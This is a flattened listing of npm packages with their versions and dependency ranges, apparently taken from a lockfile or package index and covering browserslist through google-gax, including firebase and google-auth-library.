picocolors@^1.0.0 4.17.6 caniuse-lite@^1.0.30001274 electron-to-chromium@^1.3.886 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.18.0 caniuse-lite@^1.0.30001280 electron-to-chromium@^1.3.896 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.18.1 caniuse-lite@^1.0.30001280 electron-to-chromium@^1.3.896 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.19.0 caniuse-lite@^1.0.30001286 electron-to-chromium@^1.4.17 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.19.1 caniuse-lite@^1.0.30001286 electron-to-chromium@^1.4.17 escalade@^3.1.1 node-releases@^2.0.1 picocolors@^1.0.0 4.19.2 caniuse-lite@^1.0.30001312 electron-to-chromium@^1.4.71 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.19.3 caniuse-lite@^1.0.30001312 electron-to-chromium@^1.4.71 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.20.0 caniuse-lite@^1.0.30001313 electron-to-chromium@^1.4.76 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.20.1 caniuse-lite@^1.0.30001317 electron-to-chromium@^1.4.84 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.20.2 caniuse-lite@^1.0.30001317 electron-to-chromium@^1.4.84 escalade@^3.1.1 node-releases@^2.0.2 picocolors@^1.0.0 4.20.3 caniuse-lite@^1.0.30001332 electron-to-chromium@^1.4.118 escalade@^3.1.1 node-releases@^2.0.3 picocolors@^1.0.0 4.20.4 caniuse-lite@^1.0.30001349 electron-to-chromium@^1.4.147 escalade@^3.1.1 node-releases@^2.0.5 picocolors@^1.0.0 4.21.0 caniuse-lite@^1.0.30001358 electron-to-chromium@^1.4.164 node-releases@^2.0.5 update-browserslist-db@^1.0.0 4.21.1 caniuse-lite@^1.0.30001359 electron-to-chromium@^1.4.172 node-releases@^2.0.5 update-browserslist-db@^1.0.4 4.21.2 caniuse-lite@^1.0.30001366 electron-to-chromium@^1.4.188 node-releases@^2.0.6 update-browserslist-db@^1.0.4 4.21.3 caniuse-lite@^1.0.30001370 electron-to-chromium@^1.4.202 node-releases@^2.0.6 update-browserslist-db@^1.0.5 4.21.4 caniuse-lite@^1.0.30001400 electron-to-chromium@^1.4.251 node-releases@^2.0.6 update-browserslist-db@^1.0.9 4.21.5 caniuse-lite@^1.0.30001449 electron-to-chromium@^1.4.284 node-releases@^2.0.8 update-browserslist-db@^1.0.10 4.21.6 caniuse-lite@^1.0.30001489 electron-to-chromium@^1.4.411 node-releases@^2.0.12 update-browserslist-db@^1.0.11 4.21.7 caniuse-lite@^1.0.30001489 electron-to-chromium@^1.4.411 node-releases@^2.0.12 update-browserslist-db@^1.0.11 4.21.8 caniuse-lite@^1.0.30001502 electron-to-chromium@^1.4.428 node-releases@^2.0.12 update-browserslist-db@^1.0.11 4.21.9 caniuse-lite@^1.0.30001503 electron-to-chromium@^1.4.431 node-releases@^2.0.12 update-browserslist-db@^1.0.11 4.21.10 caniuse-lite@^1.0.30001517 electron-to-chromium@^1.4.477 node-releases@^2.0.13 update-browserslist-db@^1.0.11 4.21.11 caniuse-lite@^1.0.30001538 electron-to-chromium@^1.4.526 node-releases@^2.0.13 update-browserslist-db@^1.0.13 4.22.0 caniuse-lite@^1.0.30001539 electron-to-chromium@^1.4.530 node-releases@^2.0.13 update-browserslist-db@^1.0.13 4.22.1 caniuse-lite@^1.0.30001541 electron-to-chromium@^1.4.535 node-releases@^2.0.13 update-browserslist-db@^1.0.13 4.22.2 caniuse-lite@^1.0.30001565 electron-to-chromium@^1.4.601 node-releases@^2.0.14 update-browserslist-db@^1.0.13 4.22.3 caniuse-lite@^1.0.30001580 electron-to-chromium@^1.4.648 node-releases@^2.0.14 update-browserslist-db@^1.0.13 4.23.0 caniuse-lite@^1.0.30001587 electron-to-chromium@^1.4.668 node-releases@^2.0.14 update-browserslist-db@^1.0.13 4.23.1 caniuse-lite@^1.0.30001629 electron-to-chromium@^1.4.796 node-releases@^2.0.14 update-browserslist-db@^1.0.16 4.23.2 caniuse-lite@^1.0.30001640 electron-to-chromium@^1.4.820 node-releases@^2.0.14 update-browserslist-db@^1.1.0 4.23.3 caniuse-lite@^1.0.30001646 electron-to-chromium@^1.5.4 node-releases@^2.0.18 update-browserslist-db@^1.1.0 4.24.0 caniuse-lite@^1.0.30001663 electron-to-chromium@^1.5.28 node-releases@^2.0.18 update-browserslist-db@^1.1.0 4.24.1 caniuse-lite@^1.0.30001669 electron-to-chromium@^1.5.41 node-releases@^2.0.18 update-browserslist-db@^1.1.1 4.24.2 caniuse-lite@^1.0.30001669 electron-to-chromium@^1.5.41 node-releases@^2.0.18 update-browserslist-db@^1.1.1 4.24.3 caniuse-lite@^1.0.30001688 electron-to-chromium@^1.5.73 node-releases@^2.0.19 update-browserslist-db@^1.1.1 4.24.4 caniuse-lite@^1.0.30001688 electron-to-chromium@^1.5.73 node-releases@^2.0.19 update-browserslist-db@^1.1.1 4.24.5 caniuse-lite@^1.0.30001716 electron-to-chromium@^1.5.149 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.0 caniuse-lite@^1.0.30001718 electron-to-chromium@^1.5.160 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.1 caniuse-lite@^1.0.30001726 electron-to-chromium@^1.5.173 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.2 caniuse-lite@^1.0.30001733 electron-to-chromium@^1.5.199 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.3 caniuse-lite@^1.0.30001735 electron-to-chromium@^1.5.204 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.25.4 caniuse-lite@^1.0.30001737 electron-to-chromium@^1.5.211 node-releases@^2.0.19 update-browserslist-db@^1.1.3 4.26.0 baseline-browser-mapping@^2.8.2 caniuse-lite@^1.0.30001741 electron-to-chromium@^1.5.218 node-releases@^2.0.21 update-browserslist-db@^1.1.3 4.26.1 baseline-browser-mapping@2.8.4-beta3 caniuse-lite@^1.0.30001741 electron-to-chromium@^1.5.218 node-releases@^2.0.21 update-browserslist-db@^1.1.3 4.26.2 baseline-browser-mapping@^2.8.3 caniuse-lite@^1.0.30001741 electron-to-chromium@^1.5.218 node-releases@^2.0.21 update-browserslist-db@^1.1.3 4.26.3 baseline-browser-mapping@^2.8.9 caniuse-lite@^1.0.30001746 electron-to-chromium@^1.5.227 node-releases@^2.0.21 update-browserslist-db@^1.1.3 4.27.0 baseline-browser-mapping@^2.8.19 caniuse-lite@^1.0.30001751 electron-to-chromium@^1.5.238 node-releases@^2.0.26 update-browserslist-db@^1.1.4 buffer-crc32 0.2.13 buffer-equal-constant-time 1.0.1 buffer-from 1.1.1 1.1.2 builtin-modules 3.2.0 3.3.0 bytes 3.0.0 3.1.0 3.1.2 call-bind 1.0.8 call-bind-apply-helpers@^1.0.0 es-define-property@^1.0.0 get-intrinsic@^1.2.4 set-function-length@^1.2.2 call-bind-apply-helpers 1.0.2 es-errors@^1.3.0 function-bind@^1.1.2 call-bound 1.0.4 call-bind-apply-helpers@^1.0.2 get-intrinsic@^1.3.0 camel-case 3.0.0 no-case@^2.2.0 upper-case@^1.1.1 camelcase 4.1.0 5.3.1 6.3.0 caniuse-lite 1.0.30000898 1.0.30000989 1.0.30001753 caseless 0.12.0 catharsis 0.9.0 lodash@^4.17.15 chai 4.2.0 assertion-error@^1.1.0 check-error@^1.0.2 deep-eql@^3.0.1 get-func-name@^2.0.0 pathval@^1.1.0 type-detect@^4.0.5 4.5.0 assertion-error@^1.1.0 check-error@^1.0.3 deep-eql@^4.1.3 get-func-name@^2.0.2 loupe@^2.3.6 pathval@^1.1.1 type-detect@^4.1.0 chalk 2.4.1 ansi-styles@^3.2.1 escape-string-regexp@^1.0.5 supports-color@^5.3.0 2.4.2 ansi-styles@^3.2.1 escape-string-regexp@^1.0.5 supports-color@^5.3.0 4.1.2 ansi-styles@^4.1.0 supports-color@^7.1.0 check-error 1.0.2 1.0.3 get-func-name@^2.0.2 chokidar 3.0.2 anymatch@^3.0.1 braces@^3.0.2 Opt|fsevents@^2.0.6 fsevents@^2.0.6 glob-parent@^5.0.0 is-binary-path@^2.1.0 is-glob@^4.0.1 normalize-path@^3.0.0 readdirp@^3.1.1 3.3.0 anymatch@~3.1.1 braces@~3.0.2 Opt|fsevents@~2.1.1 fsevents@~2.1.1 glob-parent@~5.1.0 is-binary-path@~2.1.0 is-glob@~4.0.1 normalize-path@~3.0.0 readdirp@~3.2.0 3.5.1 anymatch@~3.1.1 braces@~3.0.2 Opt|fsevents@~2.3.1 fsevents@~2.3.1 glob-parent@~5.1.0 is-binary-path@~2.1.0 is-glob@~4.0.1 normalize-path@~3.0.0 readdirp@~3.5.0 3.5.3 anymatch@~3.1.2 braces@~3.0.2 Opt|fsevents@~2.3.2 fsevents@~2.3.2 glob-parent@~5.1.2 is-binary-path@~2.1.0 is-glob@~4.0.1 normalize-path@~3.0.0 readdirp@~3.6.0 3.6.0 anymatch@~3.1.2 braces@~3.0.2 Opt|fsevents@~2.3.2 glob-parent@~5.1.2 is-binary-path@~2.1.0 is-glob@~4.0.1 normalize-path@~3.0.0 readdirp@~3.6.0 4.0.3 readdirp@^4.0.1 clean-css 4.2.1 source-map@~0.6.0 4.2.4 source-map@~0.6.0 clipboardy 1.2.3 arch@^2.1.0 execa@^0.8.0 2.1.0 arch@^2.1.1 execa@^1.0.0 2.3.0 arch@^2.1.1 execa@^1.0.0 is-wsl@^2.1.1 cliui 4.1.0 string-width@^2.1.1 strip-ansi@^4.0.0 wrap-ansi@^2.0.0 5.0.0 string-width@^3.1.0 strip-ansi@^5.2.0 wrap-ansi@^5.1.0 7.0.4 string-width@^4.2.0 strip-ansi@^6.0.0 wrap-ansi@^7.0.0 8.0.1 string-width@^4.2.0 strip-ansi@^6.0.1 wrap-ansi@^7.0.0 clone 2.1.2 clone-buffer 1.0.0 clone-stats 1.0.0 cloneable-readable 1.1.2 inherits@^2.0.1 process-nextick-args@^2.0.0 readable-stream@^2.3.5 1.1.3 inherits@^2.0.1 process-nextick-args@^2.0.0 readable-stream@^2.3.5 co 4.6.0 code-point-at 1.1.0 color-convert 1.9.3 color-name@1.1.3 2.0.1 color-name@~1.1.4 color-name 1.1.3 1.1.4 color-support 1.1.3 colorette 1.4.0 combined-stream 1.0.7 delayed-stream@~1.0.0 1.0.8 delayed-stream@~1.0.0 commander 0.6.1 2.3.0 2.15.1 2.17.1 2.20.0 2.20.3 commondir 1.0.1 concat-map 0.0.1 concat-stream 1.6.2 buffer-from@^1.0.0 inherits@^2.0.3 readable-stream@^2.2.2 typedarray@^0.0.6 console-log-level 1.4.1 content-disposition 0.5.2 convert-source-map 1.6.0 safe-buffer@~5.1.1 2.0.0 core-js 3.6.5 3.46.0 core-js-compat 3.2.1 browserslist@^4.6.6 semver@^6.3.0 3.46.0 browserslist@^4.26.3 core-util-is 1.0.2 1.0.3 cross-spawn 5.0.1 lru-cache@^4.0.1 shebang-command@^1.2.0 which@^1.2.9 5.1.0 lru-cache@^4.0.1 shebang-command@^1.2.0 which@^1.2.9 6.0.5 nice-try@^1.0.4 path-key@^2.0.1 semver@^5.5.0 shebang-command@^1.2.0 which@^1.2.9 6.0.6 nice-try@^1.0.4 path-key@^2.0.1 semver@^5.5.0 shebang-command@^1.2.0 which@^1.2.9 7.0.6 path-key@^3.1.0 shebang-command@^2.0.0 which@^2.0.1 cssom 0.3.4 0.3.8 0.4.1 0.4.4 cssstyle 1.1.1 cssom@0.3.x 1.4.0 cssom@0.3.x 2.0.0 cssom@~0.3.6 2.3.0 cssom@~0.3.6 custom-event-polyfill 1.0.7 dashdash 1.14.1 assert-plus@^1.0.0 dat.gui 0.7.3 0.7.9 data-urls 1.0.1 abab@^2.0.0 whatwg-mimetype@^2.1.0 whatwg-url@^7.0.0 1.1.0 abab@^2.0.0 whatwg-mimetype@^2.2.0 whatwg-url@^7.0.0 data-view-buffer 1.0.2 call-bound@^1.0.3 es-errors@^1.3.0 is-data-view@^1.0.2 data-view-byte-length 1.0.2 call-bound@^1.0.3 es-errors@^1.3.0 is-data-view@^1.0.2 data-view-byte-offset 1.0.1 call-bound@^1.0.2 es-errors@^1.3.0 is-data-view@^1.0.1 debug 2.2.0 ms@0.7.1 2.6.9 ms@2.0.0 3.1.0 ms@2.0.0 3.2.6 ms@^2.1.1 3.2.7 ms@^2.1.1 4.3.1 ms@2.1.2 4.3.3 ms@2.1.2 4.4.3 ms@^2.1.3 decamelize 1.2.0 2.0.0 xregexp@4.0.0 4.0.0 deep-eql 3.0.1 type-detect@^4.0.0 4.1.4 type-detect@^4.0.0 deep-is 0.1.3 0.1.4 deepmerge 4.2.2 4.3.1 define-data-property 1.1.4 es-define-property@^1.0.0 es-errors@^1.3.0 gopd@^1.0.1 define-properties 1.1.3 object-keys@^1.0.12 1.2.1 define-data-property@^1.0.1 has-property-descriptors@^1.0.0 object-keys@^1.1.1 delayed-stream 1.0.0 detect-libc 1.0.3 dhost 0.1.9 bytes@^3.1.0 chalk@^2.4.2 clipboardy@^1.2.3 he@^1.2.0 mime@^2.4.0 mri@^1.1.4 0.3.5 async-transforms@^1.0.7 bytes@^3.1.0 colorette@^1.2.1 esm-resolve@^1.0.4 gumnut@^0.3.8 he@^1.2.0 mime@^2.5.2 mri@^1.1.6 diff 1.4.0 3.5.0 5.0.0 5.2.0 dom-storage 2.1.0 domexception 1.0.1 webidl-conversions@^4.0.2 dunder-proto 1.0.1 call-bind-apply-helpers@^1.0.1 es-errors@^1.3.0 gopd@^1.2.0 duplexify 4.1.2 end-of-stream@^1.4.1 inherits@^2.0.3 readable-stream@^3.1.1 stream-shift@^1.0.0 4.1.3 end-of-stream@^1.4.1 inherits@^2.0.3 readable-stream@^3.1.1 stream-shift@^1.0.2 eastasianwidth 0.2.0 ecc-jsbn 0.1.2 jsbn@~0.1.0 safer-buffer@^2.1.0 ecdsa-sig-formatter 1.0.11 safe-buffer@^5.0.1 electron-to-chromium 1.3.81 1.3.264 1.5.244 1.5.245 emoji-regex 7.0.3 8.0.0 9.2.2 end-of-stream 1.4.1 once@^1.4.0 1.4.5 once@^1.4.0 ent 2.2.0 2.2.2 call-bound@^1.0.3 es-errors@^1.3.0 punycode@^1.4.1 safe-regex-test@^1.1.0 entities 4.5.0 es-abstract 1.24.0 array-buffer-byte-length@^1.0.2 arraybuffer.prototype.slice@^1.0.4 available-typed-arrays@^1.0.7 call-bind@^1.0.8 call-bound@^1.0.4 data-view-buffer@^1.0.2 data-view-byte-length@^1.0.2 data-view-byte-offset@^1.0.1 es-define-property@^1.0.1 es-errors@^1.3.0 es-object-atoms@^1.1.1 es-set-tostringtag@^2.1.0 es-to-primitive@^1.3.0 function.prototype.name@^1.1.8 get-intrinsic@^1.3.0 get-proto@^1.0.1 get-symbol-description@^1.1.0 globalthis@^1.0.4 gopd@^1.2.0 has-property-descriptors@^1.0.2 has-proto@^1.2.0 has-symbols@^1.1.0 hasown@^2.0.2 internal-slot@^1.1.0 is-array-buffer@^3.0.5 is-callable@^1.2.7 is-data-view@^1.0.2 is-negative-zero@^2.0.3 is-regex@^1.2.1 is-set@^2.0.3 is-shared-array-buffer@^1.0.4 is-string@^1.1.1 is-typed-array@^1.1.15 is-weakref@^1.1.1 math-intrinsics@^1.1.0 object-inspect@^1.13.4 object-keys@^1.1.1 object.assign@^4.1.7 own-keys@^1.0.1 regexp.prototype.flags@^1.5.4 safe-array-concat@^1.1.3 safe-push-apply@^1.0.0 safe-regex-test@^1.1.0 set-proto@^1.0.0 stop-iteration-iterator@^1.1.0 string.prototype.trim@^1.2.10 string.prototype.trimend@^1.0.9 string.prototype.trimstart@^1.0.8 typed-array-buffer@^1.0.3 typed-array-byte-length@^1.0.3 typed-array-byte-offset@^1.0.4 typed-array-length@^1.0.7 unbox-primitive@^1.1.0 which-typed-array@^1.1.19 es-array-method-boxes-properly 1.0.0 es-define-property 1.0.1 es-errors 1.3.0 es-object-atoms 1.1.1 es-errors@^1.3.0 es-set-tostringtag 2.1.0 es-errors@^1.3.0 get-intrinsic@^1.2.6 has-tostringtag@^1.0.2 hasown@^2.0.2 es-to-primitive 1.3.0 is-callable@^1.2.7 is-date-object@^1.0.5 is-symbol@^1.0.4 es6-promise 4.2.8 es6-promisify 5.0.0 es6-promise@^4.0.3 escalade 3.1.1 3.2.0 escape-string-regexp 1.0.2 1.0.5 2.0.0 4.0.0 escodegen 1.11.0 esprima@^3.1.3 estraverse@^4.2.0 esutils@^2.0.2 optionator@^0.8.1 Opt|source-map@~0.6.1 source-map@~0.6.1 1.12.0 esprima@^3.1.3 estraverse@^4.2.0 esutils@^2.0.2 optionator@^0.8.1 Opt|source-map@~0.6.1 source-map@~0.6.1 1.14.3 esprima@^4.0.1 estraverse@^4.2.0 esutils@^2.0.2 optionator@^0.8.1 Opt|source-map@~0.6.1 source-map@~0.6.1 eslint-visitor-keys 3.4.3 esm-resolve 1.0.6 1.0.11 espree 9.6.1 acorn@^8.9.0 acorn-jsx@^5.3.2 eslint-visitor-keys@^3.4.1 esprima 3.1.3 4.0.1 estraverse 4.2.0 4.3.0 5.3.0 estree-walker 1.0.1 2.0.2 esutils 2.0.2 2.0.3 event-target 1.2.3 event-target-shim 5.0.1 execa 0.8.0 cross-spawn@^5.0.1 get-stream@^3.0.0 is-stream@^1.1.0 npm-run-path@^2.0.0 p-finally@^1.0.0 signal-exit@^3.0.0 strip-eof@^1.0.0 0.10.0 cross-spawn@^6.0.0 get-stream@^3.0.0 is-stream@^1.1.0 npm-run-path@^2.0.0 p-finally@^1.0.0 signal-exit@^3.0.0 strip-eof@^1.0.0 1.0.0 cross-spawn@^6.0.0 get-stream@^4.0.0 is-stream@^1.1.0 npm-run-path@^2.0.0 p-finally@^1.0.0 signal-exit@^3.0.0 strip-eof@^1.0.0 extend 3.0.2 extract-zip 1.7.0 concat-stream@^1.6.2 debug@^2.6.9 mkdirp@^0.5.4 yauzl@^2.10.0 extsprintf 1.3.0 1.4.0 fancy-log 1.3.2 ansi-gray@^0.1.1 color-support@^1.1.3 time-stamp@^1.0.0 1.3.3 ansi-gray@^0.1.1 color-support@^1.1.3 parse-node-version@^1.0.0 time-stamp@^1.0.0 fast-async 6.3.8 nodent-compiler@^3.2.10 nodent-runtime@>=3.2.1 fast-deep-equal 1.1.0 3.1.3 fast-json-stable-stringify 2.0.0 2.1.0 fast-levenshtein 2.0.6 fast-text-encoding 1.0.3 1.0.6 fast-url-parser 1.1.3 punycode@^1.3.2 faye-websocket 0.11.3 websocket-driver@>=0.5.1 0.11.4 websocket-driver@>=0.5.1 fd-slicer 1.1.0 pend@~1.2.0 fill-range 7.0.1 to-regex-range@^5.0.1 7.1.1 to-regex-range@^5.0.1 find-up 3.0.0 locate-path@^3.0.0 5.0.0 locate-path@^6.0.0 path-exists@^4.0.0 firebase 8.10.0 @firebase/analytics@0.6.18 @firebase/app@0.6.30 @firebase/app-check@0.3.2 @firebase/app-types@0.6.3 @firebase/auth@0.16.8 @firebase/database@0.11.0 @firebase/firestore@2.4.0 @firebase/functions@0.6.15 @firebase/installations@0.4.32 @firebase/messaging@0.8.0 @firebase/performance@0.4.18 @firebase/polyfill@0.3.36 @firebase/remote-config@0.1.43 @firebase/storage@0.7.0 @firebase/util@1.3.0 8.10.1 @firebase/analytics@0.6.18 @firebase/app@0.6.30 @firebase/app-check@0.3.2 @firebase/app-types@0.6.3 @firebase/auth@0.16.8 @firebase/database@0.11.0 @firebase/firestore@2.4.1 @firebase/functions@0.6.16 @firebase/installations@0.4.32 @firebase/messaging@0.8.0 @firebase/performance@0.4.18 @firebase/polyfill@0.3.36 @firebase/remote-config@0.1.43 @firebase/storage@0.7.1 @firebase/util@1.3.0 9.23.0 @firebase/analytics@0.10.0 @firebase/analytics-compat@0.2.6 @firebase/app@0.9.13 @firebase/app-check@0.8.0 @firebase/app-check-compat@0.3.7 @firebase/app-compat@0.2.13 @firebase/app-types@0.9.0 @firebase/auth@0.23.2 @firebase/auth-compat@0.4.2 @firebase/database@0.14.4 @firebase/database-compat@0.3.4 @firebase/firestore@3.13.0 @firebase/firestore-compat@0.3.12 @firebase/functions@0.10.0 @firebase/functions-compat@0.3.5 @firebase/installations@0.6.4 @firebase/installations-compat@0.2.4 @firebase/messaging@0.12.4 @firebase/messaging-compat@0.2.4 @firebase/performance@0.6.4 @firebase/performance-compat@0.2.4 @firebase/remote-config@0.4.4 @firebase/remote-config-compat@0.2.4 @firebase/storage@0.11.2 @firebase/storage-compat@0.3.2 @firebase/util@1.9.3 10.14.1 @firebase/analytics@0.10.8 @firebase/analytics-compat@0.2.14 @firebase/app@0.10.13 @firebase/app-check@0.8.8 @firebase/app-check-compat@0.3.15 @firebase/app-compat@0.2.43 @firebase/app-types@0.9.2 @firebase/auth@1.7.9 @firebase/auth-compat@0.5.14 @firebase/data-connect@0.1.0 @firebase/database@1.0.8 @firebase/database-compat@1.0.8 @firebase/firestore@4.7.3 @firebase/firestore-compat@0.3.38 @firebase/functions@0.11.8 @firebase/functions-compat@0.3.14 @firebase/installations@0.6.9 @firebase/installations-compat@0.2.9 @firebase/messaging@0.12.12 @firebase/messaging-compat@0.2.12 @firebase/performance@0.6.9 @firebase/performance-compat@0.2.9 @firebase/remote-config@0.4.9 @firebase/remote-config-compat@0.2.9 @firebase/storage@0.13.2 @firebase/storage-compat@0.3.12 @firebase/util@1.10.0 @firebase/vertexai-preview@0.0.4 11.10.0 @firebase/ai@1.4.1 @firebase/analytics@0.10.17 @firebase/analytics-compat@0.2.23 @firebase/app@0.13.2 @firebase/app-check@0.10.1 @firebase/app-check-compat@0.3.26 @firebase/app-compat@0.4.2 @firebase/app-types@0.9.3 @firebase/auth@1.10.8 @firebase/auth-compat@0.5.28 @firebase/data-connect@0.3.10 @firebase/database@1.0.20 @firebase/database-compat@2.0.11 @firebase/firestore@4.8.0 @firebase/firestore-compat@0.3.53 @firebase/functions@0.12.9 @firebase/functions-compat@0.3.26 @firebase/installations@0.6.18 @firebase/installations-compat@0.2.18 @firebase/messaging@0.12.22 @firebase/messaging-compat@0.2.22 @firebase/performance@0.7.7 @firebase/performance-compat@0.2.20 @firebase/remote-config@0.6.5 @firebase/remote-config-compat@0.2.18 @firebase/storage@0.13.14 @firebase/storage-compat@0.3.24 @firebase/util@1.12.1 flat 4.1.1 is-buffer@~2.0.3 5.0.2 for-each 0.3.5 is-callable@^1.2.7 foreground-child 3.3.1 cross-spawn@^7.0.6 signal-exit@^4.0.1 forever-agent 0.6.1 form-data 2.3.2 asynckit@^0.4.0 combined-stream@1.0.6 mime-types@^2.1.12 2.3.3 asynckit@^0.4.0 combined-stream@^1.0.6 mime-types@^2.1.12 2.5.5 asynckit@^0.4.0 combined-stream@^1.0.8 es-set-tostringtag@^2.1.0 hasown@^2.0.2 mime-types@^2.1.35 safe-buffer@^5.2.1 formatio 1.1.1 samsam@~1.1 fraction.js 4.3.7 fs.realpath 1.0.0 fsevents 2.1.3 2.3.2 2.3.3 function-bind 1.1.1 1.1.2 function.prototype.name 1.1.8 call-bind@^1.0.8 call-bound@^1.0.3 define-properties@^1.2.1 functions-have-names@^1.2.3 hasown@^2.0.2 is-callable@^1.2.7 functions-have-names 1.2.3 gaxios 4.3.2 abort-controller@^3.0.0 extend@^3.0.2 https-proxy-agent@^5.0.0 is-stream@^2.0.0 node-fetch@^2.6.1 4.3.3 abort-controller@^3.0.0 extend@^3.0.2 https-proxy-agent@^5.0.0 is-stream@^2.0.0 node-fetch@^2.6.7 5.1.3 extend@^3.0.2 https-proxy-agent@^5.0.0 is-stream@^2.0.0 node-fetch@^2.6.9 6.7.1 extend@^3.0.2 https-proxy-agent@^7.0.1 is-stream@^2.0.0 node-fetch@^2.6.9 uuid@^9.0.1 gcp-metadata 4.3.1 gaxios@^4.0.0 json-bigint@^1.0.0 5.3.0 gaxios@^5.0.0 json-bigint@^1.0.0 6.1.1 gaxios@^6.1.1 google-logging-utils@^0.0.2 json-bigint@^1.0.0 generator-function 2.0.1 gensync 1.0.0-beta.2 get-caller-file 1.0.3 2.0.5 get-func-name 2.0.0 2.0.2 get-intrinsic 1.3.1 async-function@^1.0.0 async-generator-function@^1.0.0 call-bind-apply-helpers@^1.0.2 es-define-property@^1.0.1 es-errors@^1.3.0 es-object-atoms@^1.1.1 function-bind@^1.1.2 generator-function@^2.0.0 get-proto@^1.0.1 gopd@^1.2.0 has-symbols@^1.1.0 hasown@^2.0.2 math-intrinsics@^1.1.0 get-proto 1.0.1 dunder-proto@^1.0.1 es-object-atoms@^1.0.0 get-stream 3.0.0 4.1.0 pump@^3.0.0 get-symbol-description 1.1.0 call-bound@^1.0.3 es-errors@^1.3.0 get-intrinsic@^1.2.6 getpass 0.1.7 assert-plus@^1.0.0 git-last-commit 1.0.1 glob 3.2.11 inherits@2 minimatch@0.3 7.1.2 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.0.4 once@^1.3.0 path-is-absolute@^1.0.0 7.1.3 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.0.4 once@^1.3.0 path-is-absolute@^1.0.0 7.1.6 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.0.4 once@^1.3.0 path-is-absolute@^1.0.0 7.2.0 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.0.4 once@^1.3.0 path-is-absolute@^1.0.0 7.2.3 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.1.1 once@^1.3.0 path-is-absolute@^1.0.0 8.1.0 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^5.0.1 once@^1.3.0 11.0.3 foreground-child@^3.3.1 jackspeak@^4.1.1 minimatch@^10.0.3 minipass@^7.1.2 package-json-from-dist@^1.0.0 path-scurry@^2.0.0 glob-parent 5.0.0 is-glob@^4.0.1 5.1.2 is-glob@^4.0.1 glob-slash 1.0.0 glob-slasher 1.0.1 glob-slash@^1.0.0 lodash.isobject@^2.4.1 toxic@^1.0.0 globals 11.8.0 globalthis 1.0.4 define-properties@^1.2.1 gopd@^1.0.1 google-auth-library 7.10.1 arrify@^2.0.0 base64-js@^1.3.0 ecdsa-sig-formatter@^1.0.11 fast-text-encoding@^1.0.0 gaxios@^4.0.0 gcp-metadata@^4.2.0 gtoken@^5.0.4 jws@^4.0.0 lru-cache@^6.0.0 7.14.1 arrify@^2.0.0 base64-js@^1.3.0 ecdsa-sig-formatter@^1.0.11 fast-text-encoding@^1.0.0 gaxios@^4.0.0 gcp-metadata@^4.2.0 gtoken@^5.0.4 jws@^4.0.0 lru-cache@^6.0.0 8.9.0 arrify@^2.0.0 base64-js@^1.3.0 ecdsa-sig-formatter@^1.0.11 fast-text-encoding@^1.0.0 gaxios@^5.0.0 gcp-metadata@^5.3.0 gtoken@^6.1.0 jws@^4.0.0 lru-cache@^6.0.0 9.15.1 base64-js@^1.3.0 ecdsa-sig-formatter@^1.0.11 gaxios@^6.1.1 gcp-metadata@^6.1.0 gtoken@^7.0.0 jws@^4.0.0 google-closure-compiler 20190909.0.0 chalk@2.x google-closure-compiler-java@^20190909.0.0 google-closure-compiler-js@^20190909.0.0 google-closure-compiler-linux@^20190909.0.0 Opt|google-closure-compiler-linux@^20190909.0.0 google-closure-compiler-osx@^20190909.0.0 Opt|google-closure-compiler-osx@^20190909.0.0 google-closure-compiler-windows@^20190909.0.0 Opt|google-closure-compiler-windows@^20190909.0.0 minimist@1.x vinyl@2.x vinyl-sourcemaps-apply@^0.2.0 google-closure-compiler-java 20190909.0.0 google-closure-compiler-js 20190909.0.0 google-closure-compiler-linux 20190909.0.0 google-closure-compiler-osx 20190909.0.0 google-closure-compiler-windows 20190909.0.0 google-closure-library 20190909.0.0 20190929.0.0 20191027.0.1 promises-aplus-tests@^2.1.2 20191111.0.0 promises-aplus-tests@^2.1.2 20200101.0.0 promises-aplus-tests@^2.1.2 20200112.0.0 promises-aplus-tests@^2.1.2 20200204.0.0 20200224.0.0 20200315.0.0 google-gax 2.28.0 @grpc/grpc-js@~1.4.0 @grpc/proto-loader@^0.6.1 @types/long@^4.0.0 abort-controller@^3.0.0 duplexify@^4.0.0 fast-text-encoding@^1.0.3 google-auth-library@^7.6.1 is-stream-ended@^0.1.4 node-fetch@^2.6.1 object-hash@^2.1.1 proto3-json-serializer@^0.1.1 protobufjs@6.11.2 retry-request@^4.0.0 2.30.5 @grpc/grpc-js@~1.6.0 @grpc/proto-loader@^0.6.12 @types/long@^4.0.0 abort-controller@^3.0.0 duplexify@^4.0.0 fast-text-encoding@^1.0.3 google-auth-library@^7.14.0 is-stream-ended@^0.1.4 node-fetch@^2.6.1 object-hash@^3.0.0 proto3-json-serializer@^0.1.8 protobufjs@6.11.3 retry-request@^4.0.0 3.6.1 @grpc/grpc-js@~1.8.0 @grpc/proto-loader@^0.7.0 @types/long@^4.0.0 @types/rimraf@^3.0.2 abort-controller@^3.0.0 duplexify@^4.0.0 fast-text-encoding@^1.0.3 google-auth-library@^8.0.2 is-stream-ended@^0.1.4 node-fetch@^2.6.1 object-hash@^3.0.0 proto3-json-serializer@^1.0.0 protobufjs@7.2.4 protobufjs-cli@1.1.1 retry-request@^5.0.0 4.6.1 @grpc/grpc-js@^1.10.9 @grpc/proto-loader@^0.7.13 @types/long@^4.0.0 abort-controller@^3.0.0 duplexify@^4.0.0 google-auth-library@^9.3.0 node-fetch@^2.7.0 object-hash@^3.0.0 proto3-json-serializer@^2.0.2 protobufjs@^7.3.2 retry-request@^7.0.0 uuid@^9.0.1 